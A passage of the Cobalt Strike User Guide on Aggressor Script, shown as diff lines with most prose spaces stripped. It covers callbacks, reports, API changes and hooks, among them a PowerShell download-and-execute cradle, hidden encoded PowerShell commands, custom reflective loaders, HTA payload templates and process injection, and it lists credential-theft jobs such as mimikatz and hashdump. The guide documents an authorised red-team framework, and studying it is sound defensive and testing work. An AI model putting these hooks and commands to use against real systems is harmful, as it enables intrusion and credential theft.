+on event_notify {
+println("I see: $1");
+}
+Topostamessagetothesharedeventlog,usethe&sayfunction.
+say("Hello World");
+CobaltStrikeUserGuide www.fortra.com page:210
+
+AggressorScript/OtherTopics
+Topostamajoreventornotification(notnecessarilychit-chat),usethe&elogfunction.The
+deconflictionserverwillautomaticallytimestampandstorethisinformation.Thisinformation
+willalsoshowupinCobaltStrike'sActivityReport.
+elog("system shutdown initiated");
+Timers
+Ifyou'dliketoexecuteataskperiodically,thenyoushoulduseoneofAggressorScript'stimer
+events.Theseeventsareheartbeat_X,whereXis1s,5s,10s,15s,30s,1m,5m,10m,15m,20m,
+30m,or60m.
+on heartbeat_10s {
+println("I happen every 10 seconds");
+}
+Dialogs
+AggressorScriptprovidesseveralfunctionstopresentandrequestinformationfromtheuser.
+Use&show_messagetoprompttheuserwithamessage.Use&show_errortoprompttheuser
+withanerror.
+bind Ctrl+M {
+show_message("I am a message!");
+}
+Use&prompt_texttocreateadialogthataskstheuserfortextinput.
+prompt_text("What is your name?", "Joe Smith", {
+show_message("Please $1 $+ , pleased to meet you");
+});
+The&prompt_confirmfunctionissimilarto&prompt_text,butinsteaditasksayes/noquestion.
+Custom Dialogs
+AggressorScripthasanAPItobuildcustomdialogs.&dialogcreatesadialog.Adialogconsists
+ofrowsandbuttons.Arowisalabel,arowname,aGUIcomponenttotakeinput,andpossiblya
+helpertosettheinput.Buttonsclosethedialogandtriggeracallbackfunction.Theargumentto
+CobaltStrikeUserGuide www.fortra.com page:211
+
+AggressorScript/OtherTopics
+thecallbackfunctionisadictionarymappingeachrow'snametothevalueinitsGUI
+componentthattakesinput.Use&dialog_showtoshowadialog,onceit'sbuilt.
+Here'sadialogthatlookslikeSite Management -> Host FilefromCobaltStrike:
+sub callback {
+println("Dialog was actioned. Button: $2 Values: $3");
+}
+$dialog = dialog("Host File", %(uri => "/download/file.ext", port => 80,
+mimetype => "automatic"), &callback);
+dialog_description($dialog, "Host a file through Cobalt Strike's web server");
+drow_file($dialog, "file", "File:");
+drow_text($dialog, "uri", "Local URI:");
+drow_text($dialog, "host", "Local Host:", 20);
+drow_text($dialog, "port", "Local Port:");
+drow_combobox($dialog, "mimetype", "Mime Type:", @("automatic",
+"application/octet-stream",
+"text/html", "text/plain"));
+dbutton_action($dialog, "Launch");
+dbutton_help($dialog, "https://www.cobaltstrike.com/help-host-file");
+dialog_show($dialog);
+Let'swalkthroughthisexample:The&dialogcallcreatestheHost Filedialog.Thesecond
+parameterto&dialogisadictionarythatsetsdefaultvaluesfortheuri,port,andmimetype
+rows.Thethirdparameterisareferencetoacallbackfunction.AggressorScriptwillcallthis
+functionwhentheuserclickstheLaunchbutton.&dialog_descriptionplacesadescriptionatthe
+topofthedialog.Thisdialoghasfiverows.Thefirstrow,madeby&drow_file,hasthelabel"File:",
+thename"file",andittakesinputasatextfield.Thereisahelperbuttontochooseafileand
+populatethetextfield.Theothersrowsareconceptuallysimilar.&dbutton_actionand
+&dbutton_helpcreatebuttonsthatarecenteredatthebottomofthedialog.&dialog_show
+showsthedialog.
+Here'sthedialog:
+CobaltStrikeUserGuide www.fortra.com page:212
+
+AggressorScript/Callbacks
+figure75-Ascripteddialog.
+Callbacks
+Acallbackisusedtoallowtheusertogetaccesstotheresultanddoadditionalprocessingon
+theinformation.CobaltStrikeandAggressorScriptusestheconceptofcallbacksbecauseof
+theasynchronousbehaviorofsendingatasktobeaconandtheresponsebeingreceived
+sometimeinthefuturebasedonthecurrentsleeptime.Theyarealsousedwhendealingwith
+customdialogsinordertoperformadditionalactionsbasedoninformationfromthedialog
+inputandactionbutton.
+Onceyourasynchronouscallbackisexecutedyoucanthenperformthenecessaryoperations
+toprocesstheresultforyourusecase.Herearesomeexamplesofwhatyoucandowiththe
+result:
+l FormattheresultbeforedisplayingintheBeaconConsole
+l Scantheresultforinformationtotriggersomeadditionaltask
+l Savetheinformationtoafile
+Acallbackfunctionwillhaveargumentsandinmostcaseswillhavethesamearguments,
+howevertherearesomeexceptions.Youshouldalwaysrefertotheaggressorscriptfunction
+documentationtounderstandwhatargumentsarebeingpassedtoyourcallback.
+Callback Request and Response Processing
+Thefollowingdescribesatahighlevelwhatgoesonwhenacallbackisusedinanaggressor
+scriptcommand.
+CobaltStrikeUserGuide www.fortra.com page:213
+
+AggressorScript/Callbacks
+l Theclientexecutesanaggressorscriptcommandwithacallback
+o Arequestiscreatedandsavedinaqueuetoberetrievedlater
+o Therequestissenttotheteamserver
+l Theteamserverreceivestherequest
+o Therequestissavedinaqueuetoberetrievedlater
+o Therequestissenttoabeacon
+l TheBeaconreceivestherequestandprocessesthetask
+o Aresponseisgeneratedandsenttotheteamserver
+l Theteamserverreceivestheresponse
+o Therequestisretrievedfrom theteamserverqueueusinganidfrom theresponse
+o Areplyisgeneratedandsenttotheoriginatingclient
+l Theoriginatingclientreceivestheresponse
+o Therequestisretrievedfrom theclientqueueusinganidfrom theresponse
+o Theclientwillexecutethecallback
+Boththeclientandteamserversaverequeststhathaveassociatedcallbacksinaqueue.A
+requestiseventuallyremovedinordertomaintainthenumberofrequestinthequeue.A
+requestisremovedwhenthesetwoconditionsoccur.
+Thefirstconditioniswhentheoriginatingclientdisconnectsfromtheteamserver.Whenthis
+happensthequeuemanagedbytheclientisremovedasthequeueisperteamserver
+connection.Thequeueontheteamserverwillseetheoriginatingclienthasdisconnectedand
+flaganyrequestsforthatclienttoberemoved.Thismeanstheoriginatingclientneedstostay
+connectedtotheteamserveruntilthecommandwithacallbackhascompleted.Otherwise,any
+responsesfromBeaconafteradisconnectionfromtheoriginatingclientwillbelost.
+Thesecondconditioniswhenthereisnoresponsesforarequestafteraperiodoftime.There
+aretwotimeoutsettingsthatdetermineifarequestshouldberemoved.Thefirstsettingisthe
+limits.callback_max_timeoutwhichdefaultsto1day,whichisusedtowaitfortheinitial
+response.Thesecondsettingisthelimits.callback_keep_timeoutwhichdefaultsto1hour,
+whichisusedtowaitforsubsequentresponses.Thesesettingscanbemodifiedbyupdating
+theTeamServer.propfile.Inmostusecasesthedefaultsshouldbefine,howeverifyoucreatea
+commandthatisalong-runningjob/taskthenthesesettingsmayneedtobeadjusted.The
+adjustedsettingsneedtobebasedonhowoftendatawillbereceived,whichneedstoaccount
+forbeacon'ssleeptimeandhowoftenthejob/tasksendsdata.
+Ifyouseeerror(s)likethefollowingintheteamserverconsolewindowthenthiscanindicatethe
+settingsneedtobeadjustedortheoriginatingclienthasdisconnectedfromtheteamserver.
+`"Callback #/# has no pending request"`
+CobaltStrikeUserGuide www.fortra.com page:214
+
+AggressorScript/Callbacks
+TheTeamServer.propfileisnotincludedintheCobaltStrikedistribution.Thecurrentdefault
+filecanbefoundonGithub(https://github.com/Cobalt-Strike/teamserver-prop).
+Callback Implementation
+Aggressorscriptcallbackscanbeimplementedusingafewdifferenttechniquesandinmany
+casesthetechniqueusedisbasedonpersonalpreference.Therearesomeusecaseswhere
+youwillwanttochooseaparticulartechniqueinordertoaccomplishthetask.Thefollowing
+typeoftechniquescanbeusedfollowedbysimplesnippetsofcode:
+l AnonymousClosure
+l NamedClosure
+l LambdaClosure
+Examplesofaggressorscriptfunctionsthatsupporttheuseofacallbackfunctioncanbefound
+onGithub(https://github.com/Cobalt-Strike/callback_examples).
+AnonymousClosureExample
+Ananonymousclosureisusefulwhenyouhaveasmallamountofcodethatcanbekeptinline
+withthecaller.Inthisexampletheclosureisexecutedinthefuturewhendataisreturnedfroma
+BOF,whichsimplylogstheoutputtothebeaconconsole.
+alias cs_example {
+# User setup code removed for brevity
+beacon_inline_execute($bid, $data, "go", $args, { blog($1, $2); });
+}
+Named ClosureExample
+Anamedclosureisusefulwhenyouhavealotofcodeandmaywanttoreusethecodewith
+otheraggressorfunctions.Inthisexampletheclosurenamed`bof_cb`isexecutedinthefuture
+whendataisreturnedfromaBOF.
+# $1 - bid, $2 - result, $3 - info map
+sub bof_cb {
+# User defined code removed for brevity
+}
+alias cs_example {
+local('$bid $data $args');
+# User setup code removed for brevity
+beacon_inline_execute($bid, $data, "go", $args, &bof_cb));
+}
+CobaltStrikeUserGuide www.fortra.com page:215
+
+AggressorScript/CustomReports
+Lambda ClosureExample
+Alambdaclosureisusefulwhenyouwanttopassvariable(s)thatwouldnotbeinscopeusing
+thepreviousmethods.Thisexampleshowshowyoucangetaccesstothe$test_numvariable
+whichisinthescopeofthecs_examplealias.
+# $1 - bid, $2 - result, $3 - info map, $4 - test_num
+sub bof_cb {
+# User defined code removed for brevity
+}
+alias cs_example {
+local('$bid $file $test_num');
+# User setup code removed for brevity
+binline_execute($bid, $file, $test_num, lambda({ bof_cb
+($1, $2, $3, $test_num); }, \$test_num);
+}
+Custom Reports
+CobaltStrikeusesadomain-specificlanguagetodefineitsreports.Thislanguageissimilarto
+AggressorScriptbutdoesnothaveaccesstomostofitsAPIs.Thereportgenerationprocess
+happensinitsownscriptengineisolatedfromyourclient.
+ThereportscriptenginehasaccesstoadataaggregationAPIandafewprimitivestospecify
+thestructureofaCobaltStrikereport.
+Thedefault.rptfiledefinesthedefaultreportsinCobaltStrike.
+Loading Reports
+GotoCobalt Strike->Preferences->Reportstoloadacustomreport.PresstheFoldericon
+andselecta.rptfile.PressSave.YoushouldnowseeyourcustomreportundertheReporting
+menuinCobaltStrike.
+CobaltStrikeUserGuide www.fortra.com page:216
+
+AggressorScript/CustomReports
+figure76-Loadareportfilehere.
+Report Errors
+IfCobaltStrikehadtroublewithyourreport(e.g.,asyntaxerror,runtimeerror,etc.)thiswillshow
+upinthescriptconsole.GotoView->Script Consoletoseethesemessages.
+"Hello World"Report
+Here'sasimple"HelloWorld"report.Thisreportdoesn'trepresentanythingspecial.Itmerely
+showshowtogetstartedwithacustomreport.
+# default description of our report [the user can change this].
+describe("Hello Report", "This is a test report.");
+# define the Hello Report
+report "Hello Report" {
+# the first page is the cover page of our report.
+page "first" {
+# title heading
+h1($1['long']);
+# today's date/time in an italicized format
+ts();
+# a paragraph [could be the default...
+p($1['description']);
+}
+# this is the rest of the report
+CobaltStrikeUserGuide www.fortra.com page:217
+
+AggressorScript/CompatibilityGuide
+page "rest" {
+# hello world paragraph
+p("Hello World!");
+}
+}
+AggressorScriptdefinesnewreportswiththereportkeywordfollowedbyareportnameanda
+blockofcode.Usethepagekeywordwithinareportblocktodefinewhichpagetemplatetouse.
+Contentforapagetemplatemayspanmultiplepages.Thefirstpagetemplateisthecoverof
+CobaltStrike'sreports.Thisexampleuses&h1toprintatitleheading.The&tsfunctionprintsa
+date/timestampforthereport.Andthe&pfunctionprintsaparagraph.
+The&describefunctionsetsadefaultdescriptionofthereport.Theusermayeditthiswhenthey
+generatethereport.Thisinformationispassedtothereportaspartofthereportmetadatain
+the$1parameter.The$1parameterisadictionarywithinformationabouttheuser's
+preferencesforthereport.
+Data Aggregation API
+CobaltStrikeReportsdependontheDataAggregationAPItosourcetheirinformation.ThisAPI
+providesyouamergedviewofdatafromallteamserver'syourclientiscurrentlyconnectedto.
+TheDataAggregationAPIallowsreportstoprovideacomprehensivereportoftheassessment
+activities.Thesefunctionsbeginwiththeagprefix(e.g.,&agTargets).Thereportenginepasses
+adataaggregatemodelwhenitgeneratesareport.Thismodelisthe$3parameter.
+Compatibility Guide
+ThispagedocumentsCobaltStrikechangesversion-to-versionthatmayaffectcompatability
+withyourcurrentAggressorScripts.Ingeneral,it'sourgoalthatascriptwrittenforCobaltStrike
+3.0isforward-compatiblewithfuture3.xreleases.Majorproductreleases(e.g.,3.0->4.0)do
+giveussomelicensetorevisitAPIsandbreaksomeofthiscompatability.Sometimes,a
+compatabilitybreakingAPIchangeisinevitable.Thesechangesaredocumentedhere.
+Cobalt Strike 4.x
+1. CobaltStrike4.xmademajorchangestoCobaltStrike'slistenermanagementsystems.
+Thesechangesincludednamechangesforseveralpayloads.Scriptsthatanalyzethe
+listenerpayloadnameshouldnotethesechanges:
+l windows/beacon_smb/bind_pipeisnowwindows/beacon_bind_pipe
+l windows/beacon_tcp/bind_tcpisnowwindows/beacon_bind_tcp
+CobaltStrikeUserGuide www.fortra.com page:218
+
+AggressorScript/CompatibilityGuide
+2. CobaltStrike4.xmovesawayfrom payloadstagers.Stagelesspayloadsarepreferredin
+allpost-exworkflows.Wherestagelessisn'tpossible;useanexplicitstagerthatworks
+withallpayloads.
+Thejump psexec_pshlateralmovementattackisagoodexampleoftheabove.This
+automationgeneratesabind_pipestagertofitwithinthesizeconstraintsofa
+PowerShellone-liner.Allpayloadsaresentthroughthisstagingprocess;regardlessof
+theirconfiguration.
+Thisconventionchangewillbreaksomeprivilegeescalationscriptsthatfollowthepre-
+4.xpatternsintheElevateKit.&bstageisnowgoneasitsunderlyingfunctionalitywas
+changedtoomuchtoincludeinCobaltStrike4.x.Wherepossible,privilegeescalation
+scriptsshoulduse&payloadtoexportapayload,runitviathetechnique,anduse
+&beacon_linktoconnecttothepayload.Ifastagerisrequired;use&stager_bind_tcpto
+exportaTCPstagerand&beacon_stage_tcptostageapayloadthroughthisstager.
+3. CobaltStrike4.xremovesthefollowingAggressorScriptfunctions:
+Function Replacement Reason
+&bbypassuac &belevate &belevateisthepreferredfunctiontospawnan
+elevatedsessiononthelocalsystem
+&bpsexec_psh &bjump &bjumpisthepreferredfunctiontospawna
+sessiononaremotetarget
+&brunasadmin &belevate_ runasadminwasexpandedtoallowmultiple
+command optionstorunacommandinanelevated
+context
+&bstage multiple &bstagewouldstageANDlinkwhenneeded.
+functions Bindstagingisnowexplicitwith&beacon_
+stage_tcpor&beacon_stage_pipe.&beacon_
+linkisthegeneral"linktothislistener"step.
+&bwdigest &bmimikatz Use&bmimikatztorunthiscommand...ifyou
+reallywantto.:)
+&bwinrm &bjump,winrm &bjumpisthepreferredfunctiontospawna
+orwinrm64 sessiononaremotetarget
+&bwmi NostagelessWMIlateralmovementoption
+existsinCS4.x
+4. CobaltStrike4.xdeprecatesthefollowingAggressorScriptfunctions:
+CobaltStrikeUserGuide www.fortra.com page:219
+
+AggressorScript/Hooks
+Function Replacement Reason
+&artifact &artifact_stager Consistentarguments;consistentnaming
+convetion
+&artifact_ &artifact_ Consistentnaming;noneedforacallbackin
+stageless payload CobaltStrike4.x
+&drow_ Proxyconfigisnowtiedtothelistenerandnot
+proxyserver neededwhenexportingapayloadstage.
+&drow_listener_ &drow_listener_ Thesefunctionsarenowequivalentto
+smb stage eachother
+&listener_create &listener_create_ Alotmoreoptionsrequiredachangeinhow
+ext argumentsarepassed
+&powershell &powershell_ Consistency;de-emphasisonPowerShellone-
+command, linersinAPI
+&artifact_stager
+&powershell_ &powershell_ Clearernaming.
+encode_oneliner command
+&powershell_ &powershell_ Consistency;clearerseparationofpartsinAPI
+encode_stager command,
+&artifact_general
+&shellcode &stager Consistentarguments;consistentnaming
+Hooks
+HooksallowAggressorScripttointerceptandchangeCobaltStrikebehavior.
+APPLET_SHELLCODE_FORMAT
+Formatshellcodebeforeit'splacedontheHTMLpagegeneratedtoservetheSignedorSmart
+AppletAttacks.SeeUser-driven Web Drive-by Attacks on page 79.
+AppletKit
+ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike
+Arsenal(Help->Arsenal).
+CobaltStrikeUserGuide www.fortra.com page:220
+
+AggressorScript/Hooks
+Example
+set APPLET_SHELLCODE_FORMAT {
+return base64_encode($1);
+}
+BEACON_RDLL_GENERATE
+HooktoallowuserstoreplacetheCobaltStrikereflectiveloaderinabeaconwithaUserDefined
+ReflectiveLoader.Thereflectiveloadercanbeextractedfromacompiledobjectfileand
+pluggedintotheBeaconPayloadDLL.SeeUser Defined Reflective DLL Loader on page 164.
+Arguments
+$1-Beaconpayloadfilename
+$2-Beaconpayload(dllbinary)
+$3-Beaconarchitecture(x86/x64)
+Returns
+TheBeaconexecutablepayloadupdatedwiththeUserDefinedreflectiveloader.Return$nullto
+usethedefaultBeaconexecutablepayload.
+Example
+sub generate_my_dll {
+local('$handle $data $loader $temp_dll');
+# ---------------------------------------------------------------------
+# Load an Object File that contains a Reflective Loader.
+# The architecture ($3) is used in the path.
+# ---------------------------------------------------------------------
+# $handle = openf("/mystuff/Refloaders/bin/MyReflectiveLoader. $+ $3 $+
+.o");
+$handle = openf("mystuff/Refloaders/bin/MyReflectiveLoader. $+ $3 $+ .o");
+$data = readb($handle, -1);
+closef($handle);
+# warn("Object File Length: " . strlen($data));
+CobaltStrikeUserGuide www.fortra.com page:221
+
+AggressorScript/Hooks
+if (strlen($data) eq 0) {
+warn("Error loading reflective loader object file.");
+return $null;
+}
+# ---------------------------------------------------------------------
+# extract loader from BOF.
+# ---------------------------------------------------------------------
+$loader = extract_reflective_loader($data);
+# warn("Reflective Loader Length: " . strlen($loader));
+if (strlen($loader) eq 0) {
+warn("Error extracting reflective loader.");
+return $null;
+}
+# ---------------------------------------------------------------------
+# Replace the beacons default reflective loader with '$loader'.
+# ---------------------------------------------------------------------
+$temp_dll = setup_reflective_loader($2, $loader);
+# ---------------------------------------------------------------------
+# TODO: Additional Customization of the PE...
+# - Use 'pedump' function to get information for the updated DLL.
+# - Use these convenience functions to perform transformations on the DLL:
+# pe_remove_rich_header
+# pe_insert_rich_header
+# pe_set_compile_time_with_long
+# pe_set_compile_time_with_string
+# pe_set_export_name
+# pe_update_checksum
+# - Use these basic functions to perform transformations on the DLL:
+# pe_mask
+# pe_mask_section
+# pe_mask_string
+# pe_patch_code
+# pe_set_string
+# pe_set_stringz
+# pe_set_long
+# pe_set_short
+# pe_set_value_at
+# pe_stomp
+# ---------------------------------------------------------------------
+# ---------------------------------------------------------------------
+# Give back the updated beacon DLL.
+# ---------------------------------------------------------------------
+CobaltStrikeUserGuide www.fortra.com page:222
+
+AggressorScript/Hooks
+return $temp_dll;
+}
+# ------------------------------------
+# $1 = DLL file name
+# $2 = DLL content
+# $3 = arch
+# ------------------------------------
+set BEACON_RDLL_GENERATE {
+warn("Running 'BEACON_RDLL_GENERATE' for DLL " . $1 . " with architecture "
+. $3);
+return generate_my_dll($1, $2, $3);
+}
+BEACON_RDLL_GENERATE_LOCAL
+TheBEACON_RDLL_GENERATE_LOCALhookisverysimilartoBEACON_RDLL_GENERATEwith
+additionalarguments.
+Arguments
+$1-Beaconpayloadfilename
+$2-Beaconpayload(dllbinary)
+$3-Beaconarchitecture(x86/x64)
+$4-ParentbeaconID
+$5-GetModuleHandleApointer
+$6-GetProcAddresspointer
+Example
+# ------------------------------------
+# $1 = DLL file name
+# $2 = DLL content
+# $3 = arch
+# $4 = parent Beacon ID
+# $5 = GetModuleHandleA pointer
+# $6 = GetProcAddress pointer
+# ------------------------------------
+set BEACON_RDLL_GENERATE_LOCAL {
+warn("Running 'BEACON_RDLL_GENERATE_LOCAL' for DLL " .
+CobaltStrikeUserGuide www.fortra.com page:223
+
+AggressorScript/Hooks
+$1 ." with architecture " . $3 . " Beacon ID " . $4 . " GetModuleHandleA "
+$5 . " GetProcAddress " . $6);
+return generate_my_dll($1, $2, $3);
+}
+AlsoSee
+BEACON_RDLL_GENERATE on page 221
+BEACON_RDLL_SIZE
+TheBEACON_RDLL_SIZEhookallowstheuseofbeaconswithmorespacereservedforUser
+DefinedReflectiveloaders.ThealternatebeaconsareusedintheBEACON_RDLL_GENERATE
+andBEACON_RDLL_GENERATE_LOCALhooks.Theoriginal/defaultspacereservedfor
+reflectiveloadersis5KB.Thehookalsoallowstheentirereflectiveloaderspacetoberemoved.
+Overridingthissettingwillgeneratebeaconsthataretoolargefortheplaceholdersinstandard
+artifacts.Itisverylikelytorequirecustomizedchangesinanartifactkittoexpandreserved
+payloadspace.SeethedocumentationintheartifactkitprovidedbyCobaltStrike.
+Customized"stagesize"settingsaredocumentedin"build.sh"and"script.example".SeeUser
+Defined Reflective DLL Loader on page 164.
+Arguments
+$1-Beaconpayloadfilename
+$2-Beaconarchitecture(x86/x64)
+Returns
+ThesizeinKBfortheReflectiveLoaderreservedspaceinbeacons.Validvaluesare"0","5","100".
+"0"usesbeaconswithoutthereservedspacesforreflectiveloaders.
+"5"isthedefaultandusesstandardbeaconswith5KBreservedspaceforreflectiveloaders.
+"100"useslargerbeaconswith100KBreservedspaceforreflectiveloaders.
+Example
+# ------------------------------------
+# $1 = DLL file name
+CobaltStrikeUserGuide www.fortra.com page:224
+
+AggressorScript/Hooks
+# $2 = arch
+# ------------------------------------
+set BEACON_RDLL_SIZE {
+warn("Running 'BEACON_RDLL_SIZE' for DLL " . $1 . " with architecture " .
+$2);
+return "100";
+}
+BEACON_SLEEP_MASK
+UpdateaBeaconpayloadwithaUserDefinedSleepMask
+Arguments
+$1-beacontype(default,pivot)
+$2-arch
+SleepMaskKit
+ThishookisdemonstratedintheThe Sleep Mask Kit on page 92.
+EXECUTABLE_ARTIFACT_GENERATOR
+ControltheEXEandDLLgenerationforCobaltStrike.
+Arguments
+$1-theartifactfile(e.g.,artifact32.exe)
+$2-shellcodetoembedintoanEXEorDLL
+ArtifactKit
+ThishookisdemonstratedintheThe Artifact Kit on page 89.
+HTMLAPP_EXE
+ControlsthecontentoftheHTMLApplicationUser-driven(EXEOutput)generatedbyCobalt
+Strike.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:225
+
+AggressorScript/Hooks
+$1-theEXEdata
+$2-thenameofthe.exe
+ResourceKit
+ThishookisdemonstratedintheThe Resource Kit on page 92.
+Example
+set HTMLAPP_EXE {
+local('$handle $data');
+$handle = openf(script_resource("template.exe.hta"));
+$data = readb($handle, -1);
+osef($handle);
+$data = strrep($data, '##EXE##', transform($1, "hex"));
+$data = strrep($data, '##NAME##', $2);
+return $data;
+}
+HTMLAPP_POWERSHELL
+ControlsthecontentoftheHTMLApplicationUser-driven(PowerShellOutput)generatedby
+CobaltStrike.
+Arguments
+$1-thePowerShellcommandtorun
+ResourceKit
+ThishookisdemonstratedintheThe Resource Kit on page 92.
+Example
+set HTMLAPP_POWERSHELL {
+local('$handle $data');
+$handle = openf(script_resource("template.psh.hta"));
+$data = readb($handle, -1);
+closef($handle);
+CobaltStrikeUserGuide www.fortra.com page:226
+
+AggressorScript/Hooks
+# push our command into the script
+return strrep($data, "%%DATA%%", $1);
+}
+LISTENER_MAX_RETRY_STRATEGIES
+Returnastringthatcontainsthelistofdefinitionswhichisseparatedwitha'\n'character.The
+definitionneedstomatchasyntaxofexit-[max_attempts]-[increase_attempts]-
+[duration][m,h,d].
+Forexampleexit-10-5-5mwillexitbeaconafter10failedattemptsandwillincreasesleep
+timeafterfivefailedattemptsto5minutes.Thesleeptimewillnotbeupdatedifthecurrent
+sleeptimeisgreaterthanthespecifieddurationvalue.Thesleeptimewillbeaffectedbythe
+currentjittervalue.Onasuccessfulconnectionthefailedattemptscountwillberesettozero
+andthesleeptimewillberesettothepriorvalue.
+Return$nulltousethedefaultlist.
+Example
+# Use a hard coded list of strategies
+set LISTENER_MAX_RETRY_STRATEGIES {
+local('$out');
+$out .= "exit-50-25-5m\n";
+$out .= "exit-100-25-5m\n";
+$out .= "exit-50-25-15m\n";
+$out .= "exit-100-25-15m\n";
+return $out;
+}
+# Use loops to build a list of strategies
+set LISTENER_MAX_RETRY_STRATEGIES {
+local('$out');
+@attempts = @(50, 100);
+@durations = @("5m", "15m");
+$increase = 25;
+foreach $attempt (@attempts)
+{
+foreach $duration (@durations)
+CobaltStrikeUserGuide www.fortra.com page:227
+
+AggressorScript/Hooks
+{
+$out .= "exit $+ - $+ $attempt $+ - $+ $increase $+ - $+ $duration\n";
+}
+}
+return $out;
+}
+POSTEX_RDLL_GENERATE
+HooktoallowuserstoreplacetheCobaltStrikereflectiveloaderforpost-exwithaUserDefined
+ReflectiveLoader.SeePost-ex User Defined Reflective DLL Loader on page 163.
+ThePost-exDLLpassedasargument2doesnotcontainanyreflectiveloader.Youdonotneed
+toremoveanexistingreflectiveloaderfromtheDLL.
+Arguments
+$1–Post-expayloadfilename
+$2–Post-expayload(dllbinary)
+$3–Post-exarchitecture(x86/x64)
+$4–parentBeaconID
+$5–GetModuleHandlepointer
+$6–GetProcAddresspointer
+Returns
+ThePost-expayloadupdatedwiththeUserDefinedreflectiveloader.Return$nulltousethe
+defaultPost-expayloadandloader.
+Example
+# ------------------------------------
+# $1 = DLL file name
+# $2 = DLL content
+# $3 = arch
+# $4 = parent Beacon ID
+# $5 = GetModuleHandle pointer
+CobaltStrikeUserGuide www.fortra.com page:228
+
+AggressorScript/Hooks
+# $6 = GetProcAddress pointer
+# ------------------------------------
+set POSTEX_RDLL_GENERATE {
+local('$arch $ postex $file_handle $ldr $loader_path $payload');
+$postex = $2;
+$arch = $3;
+warn("Running 'POSTEX_RDLL_GENERATE' for DLL " .
+$1 ." with architecture " . $3 . " Beacon ID " . $4 . " .
+GetModuleHandleA “ .
+$5 . " GetProcAddress " . $6);
+# Read the UDRL from the supplied binary file
+$loader_path = "mystuff/Refloaders/bin/MyPostExReflectiveLoader. $+
+$arch $+ .o";
+$file_handle = openf($loader_path);
+$ldr = readb($file_handle, -1);
+closef($file_handle);
+if (strlen($ldr) == 0) {
+warn("Error: Failed to read $loader_path");
+return $null;
+}
+# Prepend UDRL (sRDI/Double Pulsar type) to Post-ex DLL and output
+the modified payload.
+$payload = $ldr . $postex;
+print_info("Payload Size: " . strlen($payload));
+return $payload;
+}
+POWERSHELL_COMMAND
+ChangetheformofthepowershellcomamndrunbyCobaltStrike'sautomation.Thisaffects
+jumppsexec_psh,powershell,and[host]->Access->One-liner.
+Arguments
+$1-thePowerShellcommandtorun.
+$2-true|falsethecommandisrunonaremotetarget.
+ResourceKit
+ThishookisdemonstratedintheThe Resource Kit on page 92.
+Example
+CobaltStrikeUserGuide www.fortra.com page:229
+
+AggressorScript/Hooks
+set POWERSHELL_COMMAND {
+local('$script');
+$script = transform($1, "powershell-base64");
+# remote command (e.g., jump psexec_psh)
+if ($2) {
+return "powershell -nop -w hidden -encodedcommand $script";
+}
+# local command
+else {
+return "powershell -nop -exec bypass -EncodedCommand $script";
+}
+}
+POWERSHELL_COMPRESS
+AhookusedbytheresourcekittocompressaPowerShellscript.Thedefaultusesgzipand
+returnsadeflatorscript.
+ResourceKit
+ThishookisdemonstratedintheThe Resource Kit on page 92.
+Arguments
+$1-thescripttocompress
+POWERSHELL_DOWNLOAD_CRADLE
+ChangetheformofthePowerShelldownloadcradleusedinCobaltStrike'spost-exautomation.
+Thisincludesjumpwinrm|winrm64,[host]->Access->OneLiner,andpowershell-import.
+Arguments
+$1-theURLofthe(localhost)resourcetoreach
+ResourceKit
+ThishookisdemonstratedintheThe Resource Kit on page 92.
+Example
+CobaltStrikeUserGuide www.fortra.com page:230
+
+AggressorScript/Hooks
+set POWERSHELL_DOWNLOAD_CRADLE {
+return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
+}
+PROCESS_INJECT_EXPLICIT
+Hooktoallowuserstodefinehowtheexplicitprocessinjectiontechniqueisimplementedwhen
+executingpostexploitationcommandsusingaBeaconObjectFile(BOF).
+Arguments
+$1-BeaconID
+$2-memoryinjectabledll(position-independentcode)
+$3-thePIDtoinjectinto
+$4-offsettojumpto
+$5-x86/x64-memoryinjectableDLLarch
+Returns
+Returnanonemptyvaluewhendefiningyourownexplicitprocessinjectiontechnique.
+Return$nulltousethedefaultexplicitprocessinjectiontechnique.
+PostExploitationJobs
+ThefollowingpostexploitationcommandssupportthePROCESS_INJECT_EXPLICIThook.The
+CommandcolumndisplaysthecommandtobeusedintheBeaconwindow,TheAggressor
+Scriptcolumndisplaystheaggressorscriptfunctiontobeusedinscripts,andtheUIcolumn
+displayswhichmenuoptiontouse.
+AdditionalInformation
+l
+The[ProcessBrowser]interfaceisaccessedby[beacon] -> Explore -> Process List.
+Thereisalsoamultiversionofthisinterfacewhichisaccessedbyselectingmultiple
+sessionsandusingthesameUImenu.WhenintheProcessBrowserusethebuttonsto
+perform additionalcommandsontheselectedprocess.
+CobaltStrikeUserGuide www.fortra.com page:231
+
+AggressorScript/Hooks
+l
+Thechromedump,dcsync,hashdump,keylogger,logonpasswords,mimikatz,net,
+portscan,printscreen,pth,screenshot,screenwatch,ssh,andssh-key commands
+alsohaveafork&runversion.Tousetheexplicitversionrequiresthepidandarchitecture
+arguments.
+l Forthenet and&bnet commandthe‘domain’commandwillnotusethehook.
+JobTypes
+Command Aggressor Script UI
+browserpivot &bbrowserpivot [beacon]->Explore->BrowserPivot
+chromedump
+dcsync &bdcsync
+dllinject &bdllinject
+hashdump &bhashdump
+inject &binject [ProcessBrowser]->Inject
+keylogger &bkeylogger [ProcessBrowser]->LogKeystrokes
+logonpasswords &blogonpasswords
+mimikatz &bmimikatz
+&bmimikatz_small
+net &bnet
+portscan &bportscan
+printscreen &bprintscreen
+psinject &bpsinject
+pth &bpassthehash
+screenshot &bscreenshot [ProcessBrowser]->Screenshot(Yes)
+screenwatch &bscreenwatch [ProcessBrowser]->Screenshot(No)
+shinject &bshinject
+ssh &bssh
+ssh-key &bssh_key
+Example
+CobaltStrikeUserGuide www.fortra.com page:232
+
+AggressorScript/Hooks
+# Hook to allow the user to define how the explicit injection technique
+# is implemented when executing post exploitation commands.
+# $1 = Beacon ID
+# $2 = memory injectable dll for the post exploitation command
+# $3 = the PID to inject into
+# $4 = offset to jump to
+# $5 = x86/x64 - memory injectable DLL arch
+set PROCESS_INJECT_EXPLICIT {
+local('$barch $handle $data $args $entry');
+# Set the architecture for the beacon's session
+$barch = barch($1);
+# read in the injection BOF based on barch
+warn("read the BOF: inject_explicit. $+ $barch $+ .o");
+$handle = openf(script_resource("inject_explicit. $+ $barch $+ .o"));
+$data = readb($handle, -1);
+closef($handle);
+# pack our arguments needed for the BOF
+$args = bof_pack($1, "iib", $3, $4, $2);
+btask($1, "Process Inject using explicit injection into pid $3");
+# Set the entry point based on the dll's arch
